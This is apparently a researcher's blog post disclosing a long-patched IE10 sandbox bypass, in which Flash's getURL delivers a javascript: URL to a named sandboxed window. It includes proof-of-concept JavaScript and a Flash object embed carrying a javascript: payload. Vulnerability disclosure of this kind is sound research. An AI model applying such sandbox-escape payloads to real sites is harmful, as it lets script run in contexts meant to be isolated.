IE10 Sandbox Bypass: Flash getURL with javascript: Target Reaches Sandboxed Window

After Win8 Release Preview re-enabled javascript: URLs in sandboxed iframes (having disabled them in Win8 Consumer Preview), I found that Flash’s getURL method could reach a named sandboxed window using a javascript: URI. Flash checks whether the domain of the target window matches the Flash file’s host, but knows nothing about the IE sandbox attribute — so if the URLs matched, Flash would execute the script, bypassing the sandbox. This is distinct from the earlier “Sandbox Paradox” iframe technique, which did not work across window.open targets.

// On the host page:
window.open("sandboxed.aspx","SANDBOXED_WINDOW", "width=700,height=200");
// sandboxed.aspx sets X-Content-Security-Policy to sandbox.

// From inside Flash (geturl.swf):
getURL("javascript:alert(document.body.outerHTML)", "SANDBOXED_WINDOW"); // Sandbox bypass.

<!-- Flash object injected into host page: -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="10" height="10">
    <param name="allowScriptAccess" value="Always" />
    <param name="movie" value="geturl.swf?METHOD=get&TARGET=SANDBOXED_WINDOW&REDIR=javascript:alert(document.body.outerHTML);//" />
</object>

Flash routed the javascript: URL to the named sandboxed window by matching domains, bypassing the sandbox entirely. The sandboxed window’s document.body.outerHTML was exposed to the Flash file’s JavaScript context.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 UXSS: Sandbox Paradox — javascript: URL in Sandboxed iframe Gives Cross-Origin DOM Access] :: [IE10 Sandbox Bypass: Triggering a Download and Going Back Removes Sandbox Flags] >